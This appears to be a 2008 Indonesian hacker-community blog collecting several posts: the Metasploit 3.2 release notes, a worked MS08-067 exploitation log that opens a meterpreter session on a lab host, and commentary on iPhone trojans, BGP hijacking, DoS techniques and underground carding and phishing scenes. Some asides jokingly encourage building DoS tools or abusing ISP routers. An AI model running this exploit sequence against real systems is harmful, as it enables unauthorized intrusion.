Contact: H D Moore                              FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com

Austin, Texas, November 19th, 2008 — The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
is provided under a true open source software license (BSD) and is
backed by a community-based development team.

Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the iPhone. Users can access Metasploit using the tab-completing console
interface, the Gtk GUI, the command line scripting interface, or the
AJAX-enabled web interface. The Windows version of Metasploit includes
all software dependencies and a selection of useful networking tools.

The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at

- http://metasploit.com/framework/

This release includes a significant number of new features and
capabilities, many of which are highlighted below.

Version 3.2 includes exploit modules for recent Microsoft flaws, such
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more.

The module format has been changed in version 3.2. The new format
removes the previous naming and location restrictions and paved the way
to an improved module loading and caching backend. For users, this means
being able to copy a module into nearly any subdirectory and be able to
immediately use it without edits.

The Byakugan WinDBG extension developed by Pusscat has been integrated
with this release, enabling exploit developers to quickly exploit new
vulnerabilities using the best Win32 debugger available today.

The Context-Map payload encoding system development by I)ruid is now
enabled in this release, allowing for any chunk of known process memory to
be used as an encoding key for Windows payloads.

The Incognito token manipulation toolkit, written by Luke Jennings, has
been integrated as a Meterpreter module. This allows an attacker to gain
new privleges through token hopping. The most common use is to hijack
domain admin credentials once remote system access is obtained.

The PcapRub, Scruby, and Packetfu libraries have all been linked into
the Metasploit source tree, allowing easy packet injection and capture.

The METASM pure-Ruby assembler, written by Yoann Guillot and Julien
Tinnes, has gone through a series of updates. The latest version has been
integrated with Metasploit and now supports MIPS assembly and the ability
to compile C code.

The Windows payload stagers have been updated to support targets with
NX CPU support. These stagers now allocate a read/write/exec segment of
memory for all payload downloads and execution.

Executables which have been generated by msfpayload or msfencode now
support NX CPUs. The generated executable is now smaller and more
reliable, opening the door to a wider range of uses. The psexec and
smb_relay modules now use an executable template thats acts like a real
Windows service, improving the reliability and cleanup requirements of
these modules.

The Reflective DLL Injection technique pioneered by Stephen Fewer of
Harmony Security has been integrated into the framework. The new payloads
use the “reflectivedllinjection” stager prefix and share the same binaries
as the older DLL injection method.

Client-side browser exploits now benefit from a set of new javascript
obfuscation techniques developed by Egypt. This improvement leads to a
greater degree of anti-virus bypass for client-side exploits.

Metasploit contains dozens of exploit modules for web browsers and
third-party plugins. The new browser_autopwn module ties many of these
together with advanced fingerprinting techniques to deliver more shells
than most pen-testers know what to do with.

This release includes a set of man-in-the-middle, authentication relay,
and authentication capture modules. These modules can be integrated with
a fake proxy (WPAD), a malicious access point (Karmetasploit), or basic
network traffic interception to gain access to client machines. These
modules tie together browser_autopwn, SMB relaying, and HTTP credential
and form capturing to pillage data from client systems.

Nearly all Metasploit modules now support IPv6 transports. IPv6 stagers
exist for the Windows and Linux platforms, opening the door for penetration
testing of pure IPv6 networks. The VNCInject and Meterpreter payloads have
been extensively tested over IPv6 sockets.

Efrain Torres’s WMAP project has been merged into Metasploit. WMAP is
general purpose web application scanning framework that can be automated
through integration with an attack proxy (ratproxy) or be accessed as
individual auxiliary modules.

Egypt’s new PHP payloads provide complete bind, reverse, and findsock
support for PHP web application exploits. If you are sick of C99 and R57
and looking to gain a “real” shell from one of the hundreds of RFI flaws
listed on milw0rm, the new PHP payloads work great against multiple
operating systems.

The db_autopwn command has been revamped to support port-based limits,
regex-based module matching, and limits on the number of spawned jobs. The
end result is a way to quickly launch specific modules against a specific
set of target machines. These changes were suggested and implemented by
Marcell ‘SkyOut’ Dietl (Helith).

Enjoy the release,

hdm      mc     egypt
pusscat  ramon   patrickw
I)ruid    et   kkatterjohn

——-

Taken from: Metasploit Mailing List

With such a system in place, there’s no need for iPhone anti-virus software. Our children will never know why Symantec and Norton ever existed.

Artikel tersebut menarik karena memberikan penjelasan mengapa terdapat policy code signing pada iPhone. Code signing merupakan langkah kedua bagi para developer aplikasi iPhone setelah menyelesaikan aplikasinya dan melakukan beberapa testing menggunakan iPhone simulator. Sebelum melakukan testing pada real iPhone, maka developer diwajibkan mendapatkan provisioning profile untuk proses signing code aplikasi miliknya agar dapat berjalan pada real iPhone. Setelah aplikasi dapat berjalan dengan baik, maka sang developer dapat kembali berhubungan dengan apple untuk prosedur peletakan aplikasi miliknya di apple store. Disinilah apple akan bertindak sebagai ’sang dewa’ yang akan menentukan apakah suatu aplikasi dapat dimasukan pada apple store atau tidak. Kriteria apple cukup sulit, banyak developer yang ditolak aplikasinya karena aplikasi tersebut di-indikasikan akan menjadi attack vector terhadap iPhone. Sebagai contoh, menggunakan link pada window ‘about’ yang biasanya digunakan untuk memberikan referensi ke suatu website. Hal ini diindikasikan dapat menjadi attack vector terhadap iPhone jika ternyata pada link tersebut diletakan malicious code. Saat proses submit aplikasi ke apple, itulah saat mendebarkan apakah aplikasi kita akan diterima atau tidak. Terutama saat kita berharap aplikasi tersebut akan di bandrol dengan harga tertentu.

Kenapa harus begitu sulit?! alasannya dapat ditemukan pada artikel diatas. Jika kita lihat pada Wall-e seluruh umat manusia dapat dikontrol dengan baik melalui sistem yang telah disiapkan, semua dipaksa mengikuti aturan untuk kebaikan mereka sendiri namun sepertinya tidak demikian dengan kehidupan manusia yang sebenarnya. Walaupun apple telah memberikan sistem yang telah dipersiapkan dengan baik, dan memaksa semua pengguna untuk mengikuti aturan yang telah disediakan dengan tujuan melindungi end-user dari berbagai attack vector, namun kehadiran para hacker dengan penyakit rasa ingin tahunya yang tinggi membuat sistem tersebut di rusak hanya dalam hitungan bulan sejak rilis awalnya.

Charlie Miller menunjukan proses awal pencarian bugs aplikasi iPhone, hal ini dilakukan dengan memanfaatkan ‘jailbroken iPhone’. Salah satu hasilnya adalah bugs mobile safari yang dimanfaatkan sebagai metode jailbreak firmware awal iPhone. Pada presentasi tersebut Charlie Miller juga sekaligus menunjukan metode untuk bypass code signing pada aplikasi iPhone, walaupun tidak banyak yang menyadari efek keberhasilan menjalankan aplikasi C secara bebas pada suatu platform (shellcode development, low-level debugging, backdoor development, dll).

Bagi para creative evil thinker sebetulnya tidak harus menunggu ditemukan bugs pada aplikasi iPhone, cukup dengan memanfaatkan para pengguna hasil karya saurik dimana aplikasi-aplikasi iPhone dari un-official 3rd party dapat di-install dengan mudah melalui Cydia maka seharusnya sangat mudah membuat trojan ala iPhone, yang seakan-akan memberikan aplikasi lucu nan menarik namun ternyata menjelajah isi iPhone serta mengirimkan berbagai macam informasi didalamnya (contact, notes, sms, photo, dll).

Jadi, anak dan cucu kita masih tetap akan mengenal symantec sebagai produsen anti-virus / anti-trojan, bukan begitu?!

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm <hdm@metasploit.com>

Available targets:
Id  Name
–  —-
0   Windows XP SP2 English (DEP)
1   Windows XP SP3 English (DEP)
2   Windows 2003 SP0 English (NO DEP)
3   Windows 2003 SP2 English (NO DEP)

Basic options:
Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 7 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)

meterpreter > sysinfo
Computer: Research-1
OS      : Windows XP (Build 2600, Service Pack 2).

Lagi-lagi netbios menjadi pintu masuk Microsoft Windows. Mungkin sudah saatnya pemberi tutorial melupakan RPC DCOM holes untuk contoh menembus Microsoft Windows via Metasploit.

I think everyone love 2008…

2. Pakistan melalui salah satu ISP terbesar-nya melakukan proses blocking dengan memanfaatkan kapasitas ISP tersebut untuk memainkan proses routing protokol BGP agar request dari rakyat pakistan ke youtube.com diarahkan kembali kedalam network pakistan

3. (Agar tidak perlu bersusah payah || kesalahan engineer ISP || sang engineer memahami protokol BGP dengan baik yang akan memberikan efek pada AS router ISP lain) berhasil memblock request dari rakyat pakistan yang hendak meng-akses situs youtube. Bagaimana caranya? Cukup memberikan advertisement via router BGP untuk youtube.com terhadap AS disekitarnya yang menyatakan ‘apabila ada request ke youtube.com harap diarahkan kepada kami’, secara teknikal ini dapat dilakukan dengan memberikan advertisement berupa ‘prefixes’ yang lebih kecil untuk routing menuju youtube.com

4. Selang beberapa saat setelah itu, akses ke youtube.com outage selama 2 jam. Hasil investigasi menyatakan paket data dari tempat-tempat diberbagai belahan dunia ‘blackout’ di network pakistan.

5. Insiden ini mebuahkan investigasi dan pada akhirnya public-disclosure secara meluas (yang semula hanya diketahui beberapa pihak) mengenai bugs pada protokol BGP. Tingkah laku BGP ini telah menjadi hasil riset berbagai pihak sejak awal-awal kemunculannya termasuk close-disclosure yang dilakukan oleh old-skewl hacker kepada pihak inteligent mengenai bagaimana memanfaatkan bugs ini untuk mengawasi trafik internet dunia 10 tahun yang lalu.

6. Berbeda dengan bugs DNS dimana proses mass-patch dapat dilakukan, untuk masalah ini jauh lebih sulit untuk melakukan patch, dan mungkin baru akan benar-benar aman setelah berbulan-bulan / tahunan. Setiap pihak yang memiliki akses ke BGP router dapat melakukan man-in-the-middle attack ini. Jika traffic bisa diarahkan untuk eavesdropping, mungkin donk untuk melakukan dos?

7. Beberapa sumber juga menyatakan home router yang memiliki kemampuan BGP juga dapat dimanfaatkan untuk melakukan abuse.

8. Banyak group-group underground Indonesia yang mampu mendapatkan akses suatu router ISP, dan sudah hal klasik router ISP tersebut menjadi mainan anak-anak. Mungkin dengan adanya public disclosure seperti ini, kalangan underground bisa membantu pemerintah menerapkan RUU Anti Pornografi secara langsung dan teknikal tanpa perlu tetek bengek rapat-rapat berbau politik dan menghasilkan UUD (Ujung-Ujungnya Duid).

9. Please don’t take seriously point #8 above. Tentu saja pemerintah memiliki kemampuan jika memang ada kemauan untuk melakukan blocking terhadap situs-situs pornografi. Terutama dengan adanya proses monitoring dari ID-SIRTII tercinta (small and easy step from monitoring to blocking, isn’t it?).

Sumber: http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html

Tahun 2008 sepertinya masa keemasan metode ‘partial-disclosure media hype’ oleh para researcher security, khususnya yang berasal dari USA. Dan kali ini mengikuti metode Dan Kaminsky, menunda full-disclosure dengan terlebih dahulu melakukan partial-disclosure yang memanfaatkan media hype. Hasilnya?! sebagian membuat masyarakat penasaran dan sebagian lain membuat masyarakat ketakutan karena tipe bugs-nya masih misterius.

Trik bisnis kah?! atau trik popularitas?! Don’t care. Yang pasti, tipe bugs-nya termasuk menarik untuk dibahas.

Dua jenis bugs yang mengikuti metode partial-disclsoure media hype Dan Kaminsky, dan keduanya sedang hangat dibahas saat ini. Yang pertama datang dari bidang webhacking, dan yang kedua datang dari bidang system hacking. Dan seperti biasa, keduanya ikut disulut dari salah satu mailing list tempat para researcher-researcher cerdas di bidang security berkumpul, Daily Dave mailing list.

Isu pertama datang dari kawasan webhacking mengenai “clickjacking”. Jeremiah Grossman dan Rsnake menunda full-disclosure mereka tentang clickjacking pada event OWASP ‘08 dan menggantinya dengan sesi ‘ClickJacking 20-Questions’. Hal ini membuat masyarakat kembali dalam status ’spekulasi’ mengenai bugs tersebut, karena Jeremiah dan Rsnake hanya memberikan penjelasan singkat tentang bugs tersebut. Hal ini mirip ketika Dan Kaminsky melakukan partial disclosure terhadap masyarakat dengan bugs DNS cache nya. Banyak pihak membicarakan mengenai clickjacking ini, diantaranya Giorgio Maone, Dave Aitel, hingga BeakingPoint Labs. Kita juga dapat melihat salah satu contoh spekulasi tersebut. Michal Zalewski juga ikut menjelaskan mengenai kemungkinan bugs ini serta memberikan solusi atas permasalahan tersebut. Media hyped semakin ramai dengan salah satu isi blog adobe mengenai clickjacking yang juga memberikan efek pada produk adobe.

Diantara semua, email penjelasan dari Michal Zalewski termasuk yang membuat media semakin heboh. Terutama karena salah satu solusi yang di-propose oleh dia untuk menangani masalah ini adalah ‘Rework everything we know about HTML / browser security models’. Well, at least semua researcher tersebut setuju bahwa kombinasi Mozilla Firefox + NoScript dapat mencegah user terkena efek serangan tersebut. Tapi seperti biasa, bugs ini rasanya tetap menarik untuk diikuti terutama jika mempengaruhi produk selain web browser.

Kandidat kedua untuk fans Dan’s Kaminksy partial-disclosure scenario adalah “New TCP Resource Exhaustion DOS (Denial of Service) Attack”. Fyodor (Nmap creator) baru saja hari ini menulis pada (again) mailing list Daily Dave mengenai spekulasinya terhadap jenis serangan Dos yang dikatakan ‘baru’ oleh Robert Lee dan Jack Louis. Berdasarkan keterangan Fyodor, basic jenis serangan tersebut sama sekali bukan jenis baru karena dia sudah meng-implementasikan nya pada tools Ndos beberapa tahun yang lalu namun tidak merilis tools tersebut, hanya menuliskan pada salah satu buku yang (bagian fyodor) juga di-buat free untuk dibaca secara online. I love fyodor ;).

Inti dari ‘New’ Dos tersebut terletak pada TCP Resource Exhaustion. Silahkan baca dengan cermat penjelasan Fyodor. Pada penjelasan tersebut kita dapat melihat bagaimana resource suatu sistem yang menggunakan protokol TCP/IP dapat dihabiskan. Sistem akan mengalokasikan beberapa resource-nya untuk menangani protokol TCP/IP dan penjelasan Fyodor diatas memperlihatkan bagaimana caranya menghabiskan resource tersebut secara cerdik.

Spekulasi tetaplah spekulasi, bisa jadi benar seperti yang terjadi pada bugs dns dan kaminsky, bisa jadi sebagian benar dalam arti memiliki pondasi yang mirip dengan spekulasi-spekulasi tersebut namun ’sang penemu’ memiliki cara lain untuk meng-extend bugs tersebut, bisa jadi completely false! Dalam arti, spekulasi orang-orang diseluruh dunia salah dan sang penemu merupakan orang jenius yang mampu menemukan bugs tersebut sendirian tanpa bisa disamai oleh researcher manapun.

Setelah membaca penjelasan Fyodor mengenai tehnik Ndos, mungkin ada yang bersedia menghabiskan waktunya untuk develop tools tersebut?! mungkin bisa menjadi alternative lain selain menggunakan mekanisme tembak.c secara distribusi :).

As always, media hype security circus is interesting. Hm, break time is over (sambil makan buah terakhir), put back my butt to daily job..

SMS memang sangat mudah dibaca, fresh graduate maupun anak SD yang kebetulan ikut masuk ke ruangan SMS center perusahaan telekomunikasi dapat membaca sms siapapun dari operator manapun. Pagar pengaman hanya masalah ‘kode etik’.

Seorang marketer yang baik, harus mampu melepaskan statement ambigu namun jujur. Sehingga jika ada yang complain, fakta kejujuran adalah jawaban yang tidak bisa dibantah lagi. Contoh nya: “Komunikasi bakal lebih aman karena BlackBerry memiliki teknologi enkripsi yang berbeda dengan perangkat ponsel pintar lainnya. Orang kebanyakan nyari BlackBerry karena lebih secure khususnya untuk chatting”.

2 minggu kemudian, salah satu potensial customer (red: cari arti potensial customer diatas) menulis pada kolom surat pembaca dari salah satu pojok ruangan KPK menyatakan bahwa klaim BlackBerry terbaru masih tidak aman. Terbukti ketika dia membicarakan suatu hal ‘privasi’ melalui ponsel, suaranya masih dapat ditangkap oleh perangkat KPK.

Tidak berapa lama akan muncul balasan dari pihak exelcomindo, “Maaf pak, yang kami maksud dengan lebih secure untuk layanan data seperti pesan singkat. Pada BlackBerry sekarang terdapat mekanisme PIN khusus yang terdiri dari deretan hexadecimal untuk keperluan enkripsi, dan PIN setiap device sifatnya unik. Dengan aplikasi chatting yang memanfaatkan fasilitas PIN tersebut, maka pesan dari suatu perangkat BlackBerry ke perangkat BlackBerry lainnya yang juga mendukung fasilitas tersebut akan jauh lebih aman. Hal ini mirip seperti private/public key encryption pada SSH/SSL (red: dengan harapan sang potensial customer mengerti tentang SSH/SSL). Walaupun pesan tersebut melewati network serta BlackBerry Enterprise Server (BES) sebagai relay, namun tetap jauh lebih aman dengan mekanisme PIN ini. Sedangkan untuk komunikasi Voice masih tetap melalui jalur GSM umum.”

Selama komunikasi voice masih memanfaatkan BTS (2G) ataupun Node-B (3G), dan masih melewati core network suatu operator yang telah terpasang law interception technology, penyadapan masih sangat mungkin untuk dilakukan. Namun jika ternyata KPK hanya menggunakan penyadapan berbasis radio, mungkin menggunakan network 3G (UMTS/HSDPA) akan lebih aman dibandingkan menggunakan network 2G. Karena metode enkripsi 3G memang lebih baik dibandingkan 2G.

Well, just a joke on Sunday Morning. Reading with a cup of tea would be nice. Please not to take it too seriously ;).

Thanks untuk yang selama ini sudah bersedia membaca isi blog kecoak, dan juga ikut memberikan beberapa komentar. Semoga saja untuk selanjutnya kami dari kecoak elektronik dapat terus memberikan kontribusi isi blog yang jauh lebih bermanfaat.

Namun dua istilah diatas akan berhubungan jika dimasukan dalam suatu kalimat perumpamaan yang arti sebenarnya cukup populer ditelinga orang Indonesia, “Underground tidak seluas daun kelor”.

Internet underground cenderung identik dengan aktivitas yang berhubungan dengan internet security seperti breaking server, defacing, credential stolen, backdooring, dsb. Sehingga tidak salah jika banyak maniac security di internet mengklaim underground adalah dunia mereka, dan setiap penghuninya diharuskan mengikuti aturan yang berlaku di-underground. Jika di dunia vendor dan close source ada istilah NDA (Non Disclosure Agreement) maka di underground mungkin ada istilah NDE (Non Disclosure Exploit). Masyarakat internet security berpendapat bahwa underground spirit harus dimiliki oleh setiap individu yang berkecimpung dalam internet security underground, jika mereka memiliki 0day technique atau 0day exploit maka sangat diharamkan untuk membukanya kepada publik. Jika ada yang melanggar, maka akan segera dikatakan merusak underground spirit dan tidak dapat dikategorikan sebagai masyarakat underground.

Really?! well…we can’t say it’s wrong.

Memang benar masyarakat internet security merupakan bagian dari dunia internet underground, arti mudahnya mereka melakukan berbagai aktivitas dengan menggunakan identitas yang tidak diketahui oleh publik. Hanya saja jika dipikirkan lebih tenang lagi maka dunia internet underground bukan milik para hacker-hacker security saja.

Dilihat dari arti katanya maka dunia underground adalah dunia bawah tanah, dan jika ditanya aktivitas internet seperti apa saja yang termasuk dalam kategori dunia underground maka jawabannya adalah ‘banyak’. Dan memang benar, sesuai dengan prinsip underground maka para penghuninya pun menggunakan identitas yang tidak ingin diketahui oleh banyak orang serta cenderung tertutup, at least hanya terbuka bagi sebagian orang. Bahkan beberapa tetap menjaga identitasnya walaupun terhadap teman satu kelompoknya.

Berbagai macam alasan individu untuk menikmati dunia underground. Ada yang berbagi dan melakukan aktivitas di dunia underground sebagai suatu metode mengamankan dirinya untuk tetap dapat share pengetahuan yang didapatkan dari dunia industri, kita tahu bahwa dunia industri umumnya bersifat close source namun banyak individu yang menikmati kehidupan internet underground untuk berkolaborasi dengan individu lain dan mengerjakan suatu project yang menyenangkan bagi mereka, namun menggunakan pengetahuan yang mereka dapatkan dari pekerjaan profesional masing-masing.

Ada sekelompok programmer yang bekerja pada perusahaan pembuat software komersial namun saling berkolaborasi mengerjakan project opensource, seperti OpenGL, GTK, QT, dan berbagai macam teknologi opensource yang mampu menyamai teknologi close-source. Ada individu yang bekerja pada perusahaan komersial seperti CISCO, IBM, Apple, bahkan GOOGLE namun masih tetap berkontribusi pada dunia internet underground untuk menghasilkan berbagai project-project opensource ataupun sekedar bersenang-senang bersama individu dari negara lain untuk keluar masuk server dan menuliskan nya dalam bentuk ezine (salah satu jagoan python di GOOGLE corp. masih terus hobi bermain dalam kelompok underground dan merilis ezine yang termasuk populer).

Penghuni underground lainnya seperti cracker yang sering membuat keygen untuk software-software komersial. Beberapa waktu yang lalu CyberTank sempat memberitahu beberapa individu Indonesia dengan kemampuan reverse engineering luar biasa dan terbiasa membuat keygen/crack yang mungkin selama ini kita gunakan dan tersebar diberbagai forum-forum. Mereka juga memiliki pekerjaan masing-masing, ataupun mungkin masih berstatus anak sekolah, namun juga tetap menggunakan identitas tersendiri untuk melakukan aktivitas tersebut di Underground. Dan tidak bisa dipungkiri mereka juga termasuk para aktivis underground.

Contoh penghuni underground lainnya adalah para carder di Indonesia. Banyak yang mengatakan bahwa sangat sulit untuk mengirim barang dari luar negeri ke Indonesia karena negara Indonesia termasuk dalam daftar blacklist. Namun masih tetap banyak carder-carder Indonesia yang berhasil memasukan barang-barang tersebut dengan berbagai macam metode, dan tentu saja mereka tetap menjaga identitas untuk tidak diketahui oleh publik (polisi?!). Dan tidak bisa dipungkiri juga bahwa mereka termasuk para aktivis internet underground.

Bagaimana dengan phisser?! walaupun tampak sepele, namun perubahan tingkah laku para defacer Indonesia untuk memanfaatkan phissing terhadap hasil jarahannya sudah cukup lumayan. Kita bisa melihat di milis ID-CERT yang ‘kosong’ namun tetap ramai dengan notifikasi dari berbagai perusahaan seperti paypal bahwa situs-situs Indonesia digunakan untuk kepentingan phissing. Dan mungkin cukup banyak pihak yang dirugikan dengan hasil phissing ini. Dan tentu saja mereka juga memiliki 0day technique untuk masalah phissing tersebut. Underground?! sure.

Worm/Trojan/Virus writer?! un-questionable. Di Indonesia ada banyak komunitas ini dan banyak juga yang menjaga identitas mereka untuk tetap underground, bahkan beberapa bisa dikatakan memiliki pekerjaan legal namun tetap berbagi metode dan menulis virus untuk sekedar hobi.

Phreaker juga tetap berkembang di Underground. Dengan semakin berkembangnya teknologi telekomunikasi, masih banyak didapatkan resource-resource yang menjelaskan tentang teknologi telekomunikasi padahal notabene merupakan produk industri closed source dan sulit untuk ditemukan referensinya. Namun beberapa individu tetap saling share di dunia underground mengenai teknologi ini, dan diantara hasilnya adalah hacking algoritma A3/A5 yang digunakan untuk authentifikasi dengan mesin HLR serta baseband hacking untuk iPhone.

Di Indonesia sendiri komunitas internet security masih termasuk yang paling keras gaungnya untuk menyarakan kata ‘underground’ sehingga banyak komunitas lain yang terlewatkan untuk juga dikategorikan sebagai komunitas underground. IMHO, aktivitas underground di Indonesia masih terus berkembang dan sangat menarik. Walaupun disetiap bidang underground mereka cenderung menutup diri (misal: para carder, karena jika tehnik carding mereka diketahui publik maka akan banyak merugikan para carder lainnya), namun akan sangat menyenangkan jika ada beberapa pihak yang bersedia membagikan sedikit ilmu nya (tentu saja dengan identitas yang berbeda ) kepada publik, sehingga jika ada acara seminar ataupun konferensi yang dibicarakan bukan hanya seputar IT security berbau eksploitasi, wireless, backdooring, dsb. Dengan adanya informasi tehnik carding ini bisa juga bermanfaat bagi masyarakat awam lainnya untuk lebih berhati-hati.

Ataupun juga jika para cracker/pembuat keygen dapat memberikan sedikit tehnik mereka, mungkin dapat membantu para programmer untuk melindungi hasil software buatan mereka. Dan bagi para keygen-er tentu saja akan mendapatkan tantangan baru jika para programmer semakin pintar melindungi software mereka. Bukankah itu salah satu kenikmatan melakukan reverse engineering?! :).

Komunitas IT security di Indonesia umumnya berasal dari underground yang kemudian muncul ke ‘dunia nyata’ untuk berbagi informasi mengenai teknologi IT & Security. Namun dapat diyakini beberapa individu pada komunitas tersebut tetap melakukan aktivitas underground dengan menggunakan identitas lain yang tidak dikenal (tentu saja, jika menggunakan identitas yang telah dikenal berarti bukan underground bukan?!). Dan dapat diyakini juga metode 0day baru yang mereka temukan di underground tidak akan langsung dibagikan kepada publik begitu saja, mungkin setelah puas bermain dengan metode baru tersebut barulah dibagikan kepada publik, dan itu balik lagi ke individunya masing-masing :).

Apakah salah jika komunitas security merasa bahwa dunia mereka adalah bagian dari internet underground?! no. Apakah salah jika para profesional tetap berkecimpung dalam dunia internet underground untuk sekedar memuaskan hobi mereka selepas hari-hari melelahkan akibat pekerjaan sehari-hari?! no. Apakah salah jika para penghuni underground dari berbagai bidang tersebut ingin saling berbagi experience dan bertemu (kopdar) serta berinteraksi dengan para individu dari bidang lain di dunia nyata namun tanpa merusak identitas mereka di dunia internet underground?! no.

Whatever people said, internet underground still an awesome world. Tempat bertemu dan bersosialisasi dengan beragam individu dari seluruh dunia yang memiliki hobi sama dengan kita. Dan yang pasti, tempat dimana kita bisa memuaskan hobi utak-atik tanpa perlu terbebani dengan aturan NDA dan propriatary policy.

So, what’s underground now?!

PS: Pada event idsecconf mendatang diharapkan kalian para penghuni internet underground indonesia (yes! underground) dapat ikut berpartisipasi, topik yang diharapkan untuk dibicarakan pada event tersebut bukan hanya seputar IT security. Diharapkan individu-individu / komunitas underground dapat ikut berbagi informasi walaupun sedikit. Dengan metode penggunaan identitas nick pada event tersebut maka seharusnya tidak ada masalah dengan privasi sebenarnya di Underground.

CFP already realesed now, can’t wait to see your technique to be presented there guys!